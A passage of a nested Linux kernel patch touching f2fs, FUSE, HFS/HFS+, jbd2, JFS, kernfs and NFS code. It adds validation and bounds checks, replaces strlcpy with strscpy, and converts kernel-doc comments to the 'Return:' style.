++	if (f2fs_hw_is_readonly(sbi) || f2fs_readonly(sbi->sb))
++		return -EROFS;
++
++	if (!f2fs_has_inline_data(inode))
+ 		return 0;
+ 
+ 	err = f2fs_dquot_initialize(inode);
+diff --git a/fs/f2fs/inode.c b/fs/f2fs/inode.c
+index 35b1c672644ee..ff4a4e92a40c7 100644
+--- a/fs/f2fs/inode.c
++++ b/fs/f2fs/inode.c
+@@ -27,6 +27,9 @@ void f2fs_mark_inode_dirty_sync(struct inode *inode, bool sync)
+ 	if (is_inode_flag_set(inode, FI_NEW_INODE))
+ 		return;
+ 
++	if (f2fs_readonly(F2FS_I_SB(inode)->sb))
++		return;
++
+ 	if (f2fs_inode_dirtied(inode, sync))
+ 		return;
+ 
+diff --git a/fs/f2fs/segment.h b/fs/f2fs/segment.h
+index aa9ad85e0901d..17d1723d98a0b 100644
+--- a/fs/f2fs/segment.h
++++ b/fs/f2fs/segment.h
+@@ -373,7 +373,8 @@ static inline unsigned int get_ckpt_valid_blocks(struct f2fs_sb_info *sbi,
+ 				unsigned int segno, bool use_section)
+ {
+ 	if (use_section && __is_large_section(sbi)) {
+-		unsigned int start_segno = START_SEGNO(segno);
++		unsigned int secno = GET_SEC_FROM_SEG(sbi, segno);
++		unsigned int start_segno = GET_SEG_FROM_SEC(sbi, secno);
+ 		unsigned int blocks = 0;
+ 		int i;
+ 
+diff --git a/fs/fuse/inode.c b/fs/fuse/inode.c
+index 367e3b276092f..f19bdd7cbd779 100644
+--- a/fs/fuse/inode.c
++++ b/fs/fuse/inode.c
+@@ -724,6 +724,8 @@ static int fuse_parse_param(struct fs_context *fsc, struct fs_parameter *param)
+ 	struct fs_parse_result result;
+ 	struct fuse_fs_context *ctx = fsc->fs_private;
+ 	int opt;
++	kuid_t kuid;
++	kgid_t kgid;
+ 
+ 	if (fsc->purpose == FS_CONTEXT_FOR_RECONFIGURE) {
+ 		/*
+@@ -768,16 +770,30 @@ static int fuse_parse_param(struct fs_context *fsc, struct fs_parameter *param)
+ 		break;
+ 
+ 	case OPT_USER_ID:
+-		ctx->user_id = make_kuid(fsc->user_ns, result.uint_32);
+-		if (!uid_valid(ctx->user_id))
++		kuid =  make_kuid(fsc->user_ns, result.uint_32);
++		if (!uid_valid(kuid))
+ 			return invalfc(fsc, "Invalid user_id");
++		/*
++		 * The requested uid must be representable in the
++		 * filesystem's idmapping.
++		 */
++		if (!kuid_has_mapping(fsc->user_ns, kuid))
++			return invalfc(fsc, "Invalid user_id");
++		ctx->user_id = kuid;
+ 		ctx->user_id_present = true;
+ 		break;
+ 
+ 	case OPT_GROUP_ID:
+-		ctx->group_id = make_kgid(fsc->user_ns, result.uint_32);
+-		if (!gid_valid(ctx->group_id))
++		kgid = make_kgid(fsc->user_ns, result.uint_32);;
++		if (!gid_valid(kgid))
++			return invalfc(fsc, "Invalid group_id");
++		/*
++		 * The requested gid must be representable in the
++		 * filesystem's idmapping.
++		 */
++		if (!kgid_has_mapping(fsc->user_ns, kgid))
+ 			return invalfc(fsc, "Invalid group_id");
++		ctx->group_id = kgid;
+ 		ctx->group_id_present = true;
+ 		break;
+ 
+diff --git a/fs/hfs/inode.c b/fs/hfs/inode.c
+index 80d17c520d0ba..aedb4b2621891 100644
+--- a/fs/hfs/inode.c
++++ b/fs/hfs/inode.c
+@@ -204,6 +204,7 @@ struct inode *hfs_new_inode(struct inode *dir, const struct qstr *name, umode_t
+ 	HFS_I(inode)->flags = 0;
+ 	HFS_I(inode)->rsrc_inode = NULL;
+ 	HFS_I(inode)->fs_blocks = 0;
++	HFS_I(inode)->tz_secondswest = sys_tz.tz_minuteswest * 60;
+ 	if (S_ISDIR(mode)) {
+ 		inode->i_size = 2;
+ 		HFS_SB(sb)->folder_count++;
+@@ -279,6 +280,8 @@ void hfs_inode_read_fork(struct inode *inode, struct hfs_extent *ext,
+ 	for (count = 0, i = 0; i < 3; i++)
+ 		count += be16_to_cpu(ext[i].count);
+ 	HFS_I(inode)->first_blocks = count;
++	HFS_I(inode)->cached_start = 0;
++	HFS_I(inode)->cached_blocks = 0;
+ 
+ 	inode->i_size = HFS_I(inode)->phys_size = log_size;
+ 	HFS_I(inode)->fs_blocks = (log_size + sb->s_blocksize - 1) >> sb->s_blocksize_bits;
+diff --git a/fs/hfsplus/bfind.c b/fs/hfsplus/bfind.c
+index ca2ba8c9f82ef..901e83d65d202 100644
+--- a/fs/hfsplus/bfind.c
++++ b/fs/hfsplus/bfind.c
+@@ -25,19 +25,8 @@ int hfs_find_init(struct hfs_btree *tree, struct hfs_find_data *fd)
+ 	fd->key = ptr + tree->max_key_len + 2;
+ 	hfs_dbg(BNODE_REFS, "find_init: %d (%p)\n",
+ 		tree->cnid, __builtin_return_address(0));
+-	switch (tree->cnid) {
+-	case HFSPLUS_CAT_CNID:
+-		mutex_lock_nested(&tree->tree_lock, CATALOG_BTREE_MUTEX);
+-		break;
+-	case HFSPLUS_EXT_CNID:
+-		mutex_lock_nested(&tree->tree_lock, EXTENTS_BTREE_MUTEX);
+-		break;
+-	case HFSPLUS_ATTR_CNID:
+-		mutex_lock_nested(&tree->tree_lock, ATTR_BTREE_MUTEX);
+-		break;
+-	default:
+-		BUG();
+-	}
++	mutex_lock_nested(&tree->tree_lock,
++			hfsplus_btree_lock_class(tree));
+ 	return 0;
+ }
+ 
+diff --git a/fs/hfsplus/extents.c b/fs/hfsplus/extents.c
+index 721f779b4ec3e..91354e769642f 100644
+--- a/fs/hfsplus/extents.c
++++ b/fs/hfsplus/extents.c
+@@ -430,7 +430,8 @@ int hfsplus_free_fork(struct super_block *sb, u32 cnid,
+ 		hfsplus_free_extents(sb, ext_entry, total_blocks - start,
+ 				     total_blocks);
+ 		total_blocks = start;
+-		mutex_lock(&fd.tree->tree_lock);
++		mutex_lock_nested(&fd.tree->tree_lock,
++			hfsplus_btree_lock_class(fd.tree));
+ 	} while (total_blocks > blocks);
+ 	hfs_find_exit(&fd);
+ 
+@@ -592,7 +593,8 @@ void hfsplus_file_truncate(struct inode *inode)
+ 					     alloc_cnt, alloc_cnt - blk_cnt);
+ 			hfsplus_dump_extent(hip->first_extents);
+ 			hip->first_blocks = blk_cnt;
+-			mutex_lock(&fd.tree->tree_lock);
++			mutex_lock_nested(&fd.tree->tree_lock,
++				hfsplus_btree_lock_class(fd.tree));
+ 			break;
+ 		}
+ 		res = __hfsplus_ext_cache_extent(&fd, inode, alloc_cnt);
+@@ -606,7 +608,8 @@ void hfsplus_file_truncate(struct inode *inode)
+ 		hfsplus_free_extents(sb, hip->cached_extents,
+ 				     alloc_cnt - start, alloc_cnt - blk_cnt);
+ 		hfsplus_dump_extent(hip->cached_extents);
+-		mutex_lock(&fd.tree->tree_lock);
++		mutex_lock_nested(&fd.tree->tree_lock,
++				hfsplus_btree_lock_class(fd.tree));
+ 		if (blk_cnt > start) {
+ 			hip->extent_state |= HFSPLUS_EXT_DIRTY;
+ 			break;
+diff --git a/fs/hfsplus/hfsplus_fs.h b/fs/hfsplus/hfsplus_fs.h
+index 6aa919e594834..7db213cd1eea8 100644
+--- a/fs/hfsplus/hfsplus_fs.h
++++ b/fs/hfsplus/hfsplus_fs.h
+@@ -552,6 +552,27 @@ static inline __be32 __hfsp_ut2mt(time64_t ut)
+ 	return cpu_to_be32(lower_32_bits(ut) + HFSPLUS_UTC_OFFSET);
+ }
+ 
++static inline enum hfsplus_btree_mutex_classes
++hfsplus_btree_lock_class(struct hfs_btree *tree)
++{
++	enum hfsplus_btree_mutex_classes class;
++
++	switch (tree->cnid) {
++	case HFSPLUS_CAT_CNID:
++		class = CATALOG_BTREE_MUTEX;
++		break;
++	case HFSPLUS_EXT_CNID:
++		class = EXTENTS_BTREE_MUTEX;
++		break;
++	case HFSPLUS_ATTR_CNID:
++		class = ATTR_BTREE_MUTEX;
++		break;
++	default:
++		BUG();
++	}
++	return class;
++}
++
+ /* compatibility */
+ #define hfsp_mt2ut(t)		(struct timespec64){ .tv_sec = __hfsp_mt2ut(t) }
+ #define hfsp_ut2mt(t)		__hfsp_ut2mt((t).tv_sec)
+diff --git a/fs/jbd2/commit.c b/fs/jbd2/commit.c
+index 556b259a00ba6..7b34deec8b871 100644
+--- a/fs/jbd2/commit.c
++++ b/fs/jbd2/commit.c
+@@ -801,7 +801,7 @@ void jbd2_journal_commit_transaction(journal_t *journal)
+ 		if (first_block < journal->j_tail)
+ 			freed += journal->j_last - journal->j_first;
+ 		/* Update tail only if we free significant amount of space */
+-		if (freed < jbd2_journal_get_max_txn_bufs(journal))
++		if (freed < journal->j_max_transaction_buffers)
+ 			update_tail = 0;
+ 	}
+ 	J_ASSERT(commit_transaction->t_state == T_COMMIT);
+diff --git a/fs/jbd2/journal.c b/fs/jbd2/journal.c
+index 3df45e4699f10..b136b46b63bc9 100644
+--- a/fs/jbd2/journal.c
++++ b/fs/jbd2/journal.c
+@@ -1532,6 +1532,11 @@ static void journal_fail_superblock(journal_t *journal)
+ 	journal->j_sb_buffer = NULL;
+ }
+ 
++static int jbd2_journal_get_max_txn_bufs(journal_t *journal)
++{
++	return (journal->j_total_len - journal->j_fc_wbufsize) / 4;
++}
++
+ /*
+  * Given a journal_t structure, initialise the various fields for
+  * startup of a new journaling session.  We use this both when creating
+diff --git a/fs/jfs/jfs_imap.c b/fs/jfs/jfs_imap.c
+index ac42f8ee553fc..ba6f28521360b 100644
+--- a/fs/jfs/jfs_imap.c
++++ b/fs/jfs/jfs_imap.c
+@@ -290,7 +290,7 @@ int diSync(struct inode *ipimap)
+ int diRead(struct inode *ip)
+ {
+ 	struct jfs_sb_info *sbi = JFS_SBI(ip->i_sb);
+-	int iagno, ino, extno, rc;
++	int iagno, ino, extno, rc, agno;
+ 	struct inode *ipimap;
+ 	struct dinode *dp;
+ 	struct iag *iagp;
+@@ -339,8 +339,11 @@ int diRead(struct inode *ip)
+ 
+ 	/* get the ag for the iag */
+ 	agstart = le64_to_cpu(iagp->agstart);
++	agno = BLKTOAG(agstart, JFS_SBI(ip->i_sb));
+ 
+ 	release_metapage(mp);
++	if (agno >= MAXAG || agno < 0)
++		return -EIO;
+ 
+ 	rel_inode = (ino & (INOSPERPAGE - 1));
+ 	pageno = blkno >> sbi->l2nbperpage;
+diff --git a/fs/kernfs/dir.c b/fs/kernfs/dir.c
+index a00e11ebfa775..2c74b24fc22aa 100644
+--- a/fs/kernfs/dir.c
++++ b/fs/kernfs/dir.c
+@@ -125,9 +125,9 @@ static struct kernfs_node *kernfs_common_ancestor(struct kernfs_node *a,
+  * kn_to:   /n1/n2/n3         [depth=3]
+  * result:  /../..
+  *
+- * [3] when @kn_to is NULL result will be "(null)"
++ * [3] when @kn_to is %NULL result will be "(null)"
+  *
+- * Returns the length of the full path.  If the full length is equal to or
++ * Return: the length of the constructed path.  If the path would have been
+  * greater than @buflen, @buf contains the truncated path with the trailing
+  * '\0'.  On error, -errno is returned.
+  */
+@@ -138,16 +138,17 @@ static int kernfs_path_from_node_locked(struct kernfs_node *kn_to,
+ 	struct kernfs_node *kn, *common;
+ 	const char parent_str[] = "/..";
+ 	size_t depth_from, depth_to, len = 0;
++	ssize_t copied;
+ 	int i, j;
+ 
+ 	if (!kn_to)
+-		return strlcpy(buf, "(null)", buflen);
++		return strscpy(buf, "(null)", buflen);
+ 
+ 	if (!kn_from)
+ 		kn_from = kernfs_root(kn_to)->kn;
+ 
+ 	if (kn_from == kn_to)
+-		return strlcpy(buf, "/", buflen);
++		return strscpy(buf, "/", buflen);
+ 
+ 	if (!buf)
+ 		return -EINVAL;
+@@ -161,18 +162,19 @@ static int kernfs_path_from_node_locked(struct kernfs_node *kn_to,
+ 
+ 	buf[0] = '\0';
+ 
+-	for (i = 0; i < depth_from; i++)
+-		len += strlcpy(buf + len, parent_str,
+-			       len < buflen ? buflen - len : 0);
++	for (i = 0; i < depth_from; i++) {
++		copied = strscpy(buf + len, parent_str, buflen - len);
++		if (copied < 0)
++			return copied;
++		len += copied;
++	}
+ 
+ 	/* Calculate how many bytes we need for the rest */
+ 	for (i = depth_to - 1; i >= 0; i--) {
+ 		for (kn = kn_to, j = 0; j < i; j++)
+ 			kn = kn->parent;
+-		len += strlcpy(buf + len, "/",
+-			       len < buflen ? buflen - len : 0);
+-		len += strlcpy(buf + len, kn->name,
+-			       len < buflen ? buflen - len : 0);
++
++		len += scnprintf(buf + len, buflen - len, "/%s", kn->name);
+ 	}
+ 
+ 	return len;
+@@ -185,10 +187,12 @@ static int kernfs_path_from_node_locked(struct kernfs_node *kn_to,
+  * @buflen: size of @buf
+  *
+  * Copies the name of @kn into @buf of @buflen bytes.  The behavior is
+- * similar to strlcpy().  It returns the length of @kn's name and if @buf
+- * isn't long enough, it's filled upto @buflen-1 and nul terminated.
++ * similar to strlcpy().
+  *
+- * Fills buffer with "(null)" if @kn is NULL.
++ * Fills buffer with "(null)" if @kn is %NULL.
++ *
++ * Return: the length of @kn's name and if @buf isn't long enough,
++ * it's filled up to @buflen-1 and nul terminated.
+  *
+  * This function can be called from any context.
+  */
+@@ -215,7 +219,7 @@ int kernfs_name(struct kernfs_node *kn, char *buf, size_t buflen)
+  * path (which includes '..'s) as needed to reach from @from to @to is
+  * returned.
+  *
+- * Returns the length of the full path.  If the full length is equal to or
++ * Return: the length of the constructed path.  If the path would have been
+  * greater than @buflen, @buf contains the truncated path with the trailing
+  * '\0'.  On error, -errno is returned.
+  */
+@@ -266,12 +270,10 @@ void pr_cont_kernfs_path(struct kernfs_node *kn)
+ 	sz = kernfs_path_from_node(kn, NULL, kernfs_pr_cont_buf,
+ 				   sizeof(kernfs_pr_cont_buf));
+ 	if (sz < 0) {
+-		pr_cont("(error)");
+-		goto out;
+-	}
+-
+-	if (sz >= sizeof(kernfs_pr_cont_buf)) {
+-		pr_cont("(name too long)");
++		if (sz == -E2BIG)
++			pr_cont("(name too long)");
++		else
++			pr_cont("(error)");
+ 		goto out;
+ 	}
+ 
+@@ -287,6 +289,8 @@ void pr_cont_kernfs_path(struct kernfs_node *kn)
+  *
+  * Determines @kn's parent, pins and returns it.  This function can be
+  * called from any context.
++ *
++ * Return: parent node of @kn
+  */
+ struct kernfs_node *kernfs_get_parent(struct kernfs_node *kn)
+ {
+@@ -302,11 +306,11 @@ struct kernfs_node *kernfs_get_parent(struct kernfs_node *kn)
+ }
+ 
+ /**
+- *	kernfs_name_hash
++ *	kernfs_name_hash - calculate hash of @ns + @name
+  *	@name: Null terminated string to hash
+  *	@ns:   Namespace tag to hash
+  *
+- *	Returns 31 bit hash of ns + name (so it fits in an off_t )
++ *	Return: 31-bit hash of ns + name (so it fits in an off_t)
+  */
+ static unsigned int kernfs_name_hash(const char *name, const void *ns)
+ {
+@@ -354,8 +358,8 @@ static int kernfs_sd_compare(const struct kernfs_node *left,
+  *	Locking:
+  *	kernfs_rwsem held exclusive
+  *
+- *	RETURNS:
+- *	0 on susccess -EEXIST on failure.
++ *	Return:
++ *	%0 on success, -EEXIST on failure.
+  */
+ static int kernfs_link_sibling(struct kernfs_node *kn)
+ {
+@@ -394,8 +398,10 @@ static int kernfs_link_sibling(struct kernfs_node *kn)
+  *	@kn: kernfs_node of interest
+  *
+  *	Try to unlink @kn from its sibling rbtree which starts from
+- *	kn->parent->dir.children.  Returns %true if @kn was actually
+- *	removed, %false if @kn wasn't on the rbtree.
++ *	kn->parent->dir.children.
++ *
++ *	Return: %true if @kn was actually removed,
++ *	%false if @kn wasn't on the rbtree.
+  *
+  *	Locking:
+  *	kernfs_rwsem held exclusive
+@@ -419,10 +425,10 @@ static bool kernfs_unlink_sibling(struct kernfs_node *kn)
+  *	@kn: kernfs_node to get an active reference to
+  *
+  *	Get an active reference of @kn.  This function is noop if @kn
+- *	is NULL.
++ *	is %NULL.
+  *
+- *	RETURNS:
+- *	Pointer to @kn on success, NULL on failure.
++ *	Return:
++ *	Pointer to @kn on success, %NULL on failure.
+  */
+ struct kernfs_node *kernfs_get_active(struct kernfs_node *kn)
+ {
+@@ -442,7 +448,7 @@ struct kernfs_node *kernfs_get_active(struct kernfs_node *kn)
+  *	@kn: kernfs_node to put an active reference to
+  *
+  *	Put an active reference to @kn.  This function is noop if @kn
+- *	is NULL.
++ *	is %NULL.
+  */
+ void kernfs_put_active(struct kernfs_node *kn)
+ {
+@@ -464,7 +470,7 @@ void kernfs_put_active(struct kernfs_node *kn)
+  * kernfs_drain - drain kernfs_node
+  * @kn: kernfs_node to drain
+  *
+- * Drain existing usages and nuke all existing mmaps of @kn.  Mutiple
++ * Drain existing usages and nuke all existing mmaps of @kn.  Multiple
+  * removers may invoke this function concurrently on @kn and all will
+  * return after draining is complete.
+  */
+@@ -577,7 +583,7 @@ EXPORT_SYMBOL_GPL(kernfs_put);
+  * kernfs_node_from_dentry - determine kernfs_node associated with a dentry
+  * @dentry: the dentry in question
+  *
+- * Return the kernfs_node associated with @dentry.  If @dentry is not a
++ * Return: the kernfs_node associated with @dentry.  If @dentry is not a
+  * kernfs one, %NULL is returned.
+  *
+  * While the returned kernfs_node will stay accessible as long as @dentry
+@@ -698,8 +704,8 @@ struct kernfs_node *kernfs_new_node(struct kernfs_node *parent,
+  * @id's lower 32bits encode ino and upper gen.  If the gen portion is
+  * zero, all generations are matched.
+  *
+- * RETURNS:
+- * NULL on failure. Return a kernfs node with reference counter incremented
++ * Return: %NULL on failure,
++ * otherwise a kernfs node with reference counter incremented.
+  */
+ struct kernfs_node *kernfs_find_and_get_node_by_id(struct kernfs_root *root,
+ 						   u64 id)
+@@ -747,8 +753,8 @@ struct kernfs_node *kernfs_find_and_get_node_by_id(struct kernfs_root *root,
+  *	function increments nlink of the parent's inode if @kn is a
+  *	directory and link into the children list of the parent.
+  *
+- *	RETURNS:
+- *	0 on success, -EEXIST if entry with the given name already
++ *	Return:
++ *	%0 on success, -EEXIST if entry with the given name already
+  *	exists.
+  */
+ int kernfs_add_one(struct kernfs_node *kn)
+@@ -811,8 +817,9 @@ int kernfs_add_one(struct kernfs_node *kn)
+  * @name: name to look for
+  * @ns: the namespace tag to use
+  *
+- * Look for kernfs_node with name @name under @parent.  Returns pointer to
+- * the found kernfs_node on success, %NULL on failure.
++ * Look for kernfs_node with name @name under @parent.
++ *
++ * Return: pointer to the found kernfs_node on success, %NULL on failure.
+  */
+ static struct kernfs_node *kernfs_find_ns(struct kernfs_node *parent,
+ 					  const unsigned char *name,
+@@ -885,8 +892,9 @@ static struct kernfs_node *kernfs_walk_ns(struct kernfs_node *parent,
+  * @ns: the namespace tag to use
+  *
+  * Look for kernfs_node with name @name under @parent and get a reference
+- * if found.  This function may sleep and returns pointer to the found
+- * kernfs_node on success, %NULL on failure.
++ * if found.  This function may sleep.
++ *
++ * Return: pointer to the found kernfs_node on success, %NULL on failure.
+  */
+ struct kernfs_node *kernfs_find_and_get_ns(struct kernfs_node *parent,
+ 					   const char *name, const void *ns)
+@@ -910,8 +918,9 @@ EXPORT_SYMBOL_GPL(kernfs_find_and_get_ns);
+  * @ns: the namespace tag to use
+  *
+  * Look for kernfs_node with path @path under @parent and get a reference
+- * if found.  This function may sleep and returns pointer to the found
+- * kernfs_node on success, %NULL on failure.
++ * if found.  This function may sleep.
++ *
++ * Return: pointer to the found kernfs_node on success, %NULL on failure.
+  */
+ struct kernfs_node *kernfs_walk_and_get_ns(struct kernfs_node *parent,
+ 					   const char *path, const void *ns)
+@@ -933,7 +942,7 @@ struct kernfs_node *kernfs_walk_and_get_ns(struct kernfs_node *parent,
+  * @flags: KERNFS_ROOT_* flags
+  * @priv: opaque data associated with the new directory
+  *
+- * Returns the root of the new hierarchy on success, ERR_PTR() value on
++ * Return: the root of the new hierarchy on success, ERR_PTR() value on
+  * failure.
+  */
+ struct kernfs_root *kernfs_create_root(struct kernfs_syscall_ops *scops,
+@@ -1005,6 +1014,8 @@ void kernfs_destroy_root(struct kernfs_root *root)
+ /**
+  * kernfs_root_to_node - return the kernfs_node associated with a kernfs_root
+  * @root: root to use to lookup
++ *
++ * Return: @root's kernfs_node
+  */
+ struct kernfs_node *kernfs_root_to_node(struct kernfs_root *root)
+ {
+@@ -1021,7 +1032,7 @@ struct kernfs_node *kernfs_root_to_node(struct kernfs_root *root)
+  * @priv: opaque data associated with the new directory
+  * @ns: optional namespace tag of the directory
+  *
+- * Returns the created node on success, ERR_PTR() value on failure.
++ * Return: the created node on success, ERR_PTR() value on failure.
+  */
+ struct kernfs_node *kernfs_create_dir_ns(struct kernfs_node *parent,
+ 					 const char *name, umode_t mode,
+@@ -1055,7 +1066,7 @@ struct kernfs_node *kernfs_create_dir_ns(struct kernfs_node *parent,
+  * @parent: parent in which to create a new directory
+  * @name: name of the new directory
+  *
+- * Returns the created node on success, ERR_PTR() value on failure.
++ * Return: the created node on success, ERR_PTR() value on failure.
+  */
+ struct kernfs_node *kernfs_create_empty_dir(struct kernfs_node *parent,
+ 					    const char *name)
+@@ -1304,6 +1315,8 @@ static struct kernfs_node *kernfs_leftmost_descendant(struct kernfs_node *pos)
+  * Find the next descendant to visit for post-order traversal of @root's
+  * descendants.  @root is included in the iteration and the last node to be
+  * visited.
++ *
++ * Return: the next descendant to visit or %NULL when done.
+  */
+ static struct kernfs_node *kernfs_next_descendant_post(struct kernfs_node *pos,
+ 						       struct kernfs_node *root)
+@@ -1567,6 +1580,8 @@ void kernfs_unbreak_active_protection(struct kernfs_node *kn)
+  * the whole kernfs_ops which won the arbitration.  This can be used to
+  * guarantee, for example, all concurrent writes to a "delete" file to
+  * finish only after the whole operation is complete.
++ *
++ * Return: %true if @kn is removed by this call, otherwise %false.
+  */
+ bool kernfs_remove_self(struct kernfs_node *kn)
+ {
+@@ -1627,7 +1642,8 @@ bool kernfs_remove_self(struct kernfs_node *kn)
+  * @ns: namespace tag of the kernfs_node to remove
+  *
+  * Look for the kernfs_node with @name and @ns under @parent and remove it.
+- * Returns 0 on success, -ENOENT if such entry doesn't exist.
++ *
++ * Return: %0 on success, -ENOENT if such entry doesn't exist.
+  */
+ int kernfs_remove_by_name_ns(struct kernfs_node *parent, const char *name,
+ 			     const void *ns)
+@@ -1665,6 +1681,8 @@ int kernfs_remove_by_name_ns(struct kernfs_node *parent, const char *name,
+  * @new_parent: new parent to put @sd under
+  * @new_name: new name
+  * @new_ns: new namespace tag
++ *
++ * Return: %0 on success, -errno on failure.
+  */
+ int kernfs_rename_ns(struct kernfs_node *kn, struct kernfs_node *new_parent,
+ 		     const char *new_name, const void *new_ns)
+diff --git a/fs/kernfs/file.c b/fs/kernfs/file.c
+index 9ab6c92e02dab..e4a50e4ff0d23 100644
+--- a/fs/kernfs/file.c
++++ b/fs/kernfs/file.c
+@@ -33,7 +33,7 @@ struct kernfs_open_node {
+  * pending queue is implemented as a singly linked list of kernfs_nodes.
+  * The list is terminated with the self pointer so that whether a
+  * kernfs_node is on the list or not can be determined by testing the next
+- * pointer for NULL.
++ * pointer for %NULL.
+  */
+ #define KERNFS_NOTIFY_EOL			((void *)&kernfs_notify_list)
+ 
+@@ -59,8 +59,10 @@ static inline struct mutex *kernfs_open_file_mutex_lock(struct kernfs_node *kn)
+ }
+ 
+ /**
+- * of_on - Return the kernfs_open_node of the specified kernfs_open_file
+- * @of: taret kernfs_open_file
++ * of_on - Get the kernfs_open_node of the specified kernfs_open_file
++ * @of: target kernfs_open_file
++ *
++ * Return: the kernfs_open_node of the kernfs_open_file
+  */
+ static struct kernfs_open_node *of_on(struct kernfs_open_file *of)
+ {
+@@ -82,6 +84,8 @@ static struct kernfs_open_node *of_on(struct kernfs_open_file *of)
+  * outside RCU read-side critical section.
+  *
+  * The caller needs to make sure that kernfs_open_file_mutex is held.
++ *
++ * Return: @kn->attr.open when kernfs_open_file_mutex is held.
+  */
+ static struct kernfs_open_node *
+ kernfs_deref_open_node_locked(struct kernfs_node *kn)
+@@ -548,11 +552,11 @@ static int kernfs_fop_mmap(struct file *file, struct vm_area_struct *vma)
+  *	If @kn->attr.open exists, increment its reference count; otherwise,
+  *	create one.  @of is chained to the files list.
+  *
+- *	LOCKING:
++ *	Locking:
+  *	Kernel thread context (may sleep).
+  *
+- *	RETURNS:
+- *	0 on success, -errno on failure.
++ *	Return:
++ *	%0 on success, -errno on failure.
+  */
+ static int kernfs_get_open_node(struct kernfs_node *kn,
+ 				struct kernfs_open_file *of)
+@@ -1024,7 +1028,7 @@ const struct file_operations kernfs_file_fops = {
+  * @ns: optional namespace tag of the file
+  * @key: lockdep key for the file's active_ref, %NULL to disable lockdep
+  *
+- * Returns the created node on success, ERR_PTR() value on error.
++ * Return: the created node on success, ERR_PTR() value on error.
+  */
+ struct kernfs_node *__kernfs_create_file(struct kernfs_node *parent,
+ 					 const char *name,
+diff --git a/fs/kernfs/inode.c b/fs/kernfs/inode.c
+index 3d783d80f5daa..076ba9884916c 100644
+--- a/fs/kernfs/inode.c
++++ b/fs/kernfs/inode.c
+@@ -94,7 +94,7 @@ int __kernfs_setattr(struct kernfs_node *kn, const struct iattr *iattr)
+  * @kn: target node
+  * @iattr: iattr to set
+  *
+- * Returns 0 on success, -errno on failure.
++ * Return: %0 on success, -errno on failure.
+  */
+ int kernfs_setattr(struct kernfs_node *kn, const struct iattr *iattr)
+ {
+@@ -241,11 +241,11 @@ static void kernfs_init_inode(struct kernfs_node *kn, struct inode *inode)
+  *	allocated and basics are initialized.  New inode is returned
+  *	locked.
+  *
+- *	LOCKING:
++ *	Locking:
+  *	Kernel thread context (may sleep).
+  *
+- *	RETURNS:
+- *	Pointer to allocated inode on success, NULL on failure.
++ *	Return:
++ *	Pointer to allocated inode on success, %NULL on failure.
+  */
+ struct inode *kernfs_get_inode(struct super_block *sb, struct kernfs_node *kn)
+ {
+diff --git a/fs/kernfs/kernfs-internal.h b/fs/kernfs/kernfs-internal.h
+index fc5821effd97d..9046d9f39e635 100644
+--- a/fs/kernfs/kernfs-internal.h
++++ b/fs/kernfs/kernfs-internal.h
+@@ -58,7 +58,7 @@ struct kernfs_root {
+  * kernfs_root - find out the kernfs_root a kernfs_node belongs to
+  * @kn: kernfs_node of interest
+  *
+- * Return the kernfs_root @kn belongs to.
++ * Return: the kernfs_root @kn belongs to.
+  */
+ static inline struct kernfs_root *kernfs_root(struct kernfs_node *kn)
+ {
+diff --git a/fs/kernfs/mount.c b/fs/kernfs/mount.c
+index d0859f72d2d64..e08e8d9998070 100644
+--- a/fs/kernfs/mount.c
++++ b/fs/kernfs/mount.c
+@@ -153,7 +153,7 @@ static const struct export_operations kernfs_export_ops = {
+  * kernfs_root_from_sb - determine kernfs_root associated with a super_block
+  * @sb: the super_block in question
+  *
+- * Return the kernfs_root associated with @sb.  If @sb is not a kernfs one,
++ * Return: the kernfs_root associated with @sb.  If @sb is not a kernfs one,
+  * %NULL is returned.
+  */
+ struct kernfs_root *kernfs_root_from_sb(struct super_block *sb)
+@@ -167,7 +167,7 @@ struct kernfs_root *kernfs_root_from_sb(struct super_block *sb)
+  * find the next ancestor in the path down to @child, where @parent was the
+  * ancestor whose descendant we want to find.
+  *
+- * Say the path is /a/b/c/d.  @child is d, @parent is NULL.  We return the root
++ * Say the path is /a/b/c/d.  @child is d, @parent is %NULL.  We return the root
+  * node.  If @parent is b, then we return the node for c.
+  * Passing in d as @parent is not ok.
+  */
+@@ -192,6 +192,8 @@ static struct kernfs_node *find_next_ancestor(struct kernfs_node *child,
+  * kernfs_node_dentry - get a dentry for the given kernfs_node
+  * @kn: kernfs_node for which a dentry is needed
+  * @sb: the kernfs super_block
++ *
++ * Return: the dentry pointer
+  */
+ struct dentry *kernfs_node_dentry(struct kernfs_node *kn,
+ 				  struct super_block *sb)
+@@ -296,7 +298,7 @@ static int kernfs_set_super(struct super_block *sb, struct fs_context *fc)
+  * kernfs_super_ns - determine the namespace tag of a kernfs super_block
+  * @sb: super_block of interest
+  *
+- * Return the namespace tag associated with kernfs super_block @sb.
++ * Return: the namespace tag associated with kernfs super_block @sb.
+  */
+ const void *kernfs_super_ns(struct super_block *sb)
+ {
+@@ -313,6 +315,8 @@ const void *kernfs_super_ns(struct super_block *sb)
+  * implementation, which should set the specified ->@fs_type and ->@flags, and
+  * specify the hierarchy and namespace tag to mount via ->@root and ->@ns,
+  * respectively.
++ *
++ * Return: %0 on success, -errno on failure.
+  */
+ int kernfs_get_tree(struct fs_context *fc)
+ {
+diff --git a/fs/kernfs/symlink.c b/fs/kernfs/symlink.c
+index 0ab13824822f7..45371a70caa71 100644
+--- a/fs/kernfs/symlink.c
++++ b/fs/kernfs/symlink.c
+@@ -19,7 +19,7 @@
+  * @name: name of the symlink
+  * @target: target node for the symlink to point to
+  *
+- * Returns the created node on success, ERR_PTR() value on error.
++ * Return: the created node on success, ERR_PTR() value on error.
+  * Ownership of the link matches ownership of the target.
+  */
+ struct kernfs_node *kernfs_create_link(struct kernfs_node *parent,
+diff --git a/fs/nfs/nfs4client.c b/fs/nfs/nfs4client.c
+index 84b345efcec00..02caeec2c1739 100644
+--- a/fs/nfs/nfs4client.c
++++ b/fs/nfs/nfs4client.c
+@@ -230,9 +230,8 @@ struct nfs_client *nfs4_alloc_client(const struct nfs_client_initdata *cl_init)
+ 		__set_bit(NFS_CS_INFINITE_SLOTS, &clp->cl_flags);
+ 	__set_bit(NFS_CS_DISCRTRY, &clp->cl_flags);
+ 	__set_bit(NFS_CS_NO_RETRANS_TIMEOUT, &clp->cl_flags);
+-
+-	if (test_bit(NFS_CS_DS, &cl_init->init_flags))
+-		__set_bit(NFS_CS_DS, &clp->cl_flags);
++	if (test_bit(NFS_CS_PNFS, &cl_init->init_flags))
++		__set_bit(NFS_CS_PNFS, &clp->cl_flags);
+ 	/*
+ 	 * Set up the connection to the server before we add add to the
+ 	 * global list.
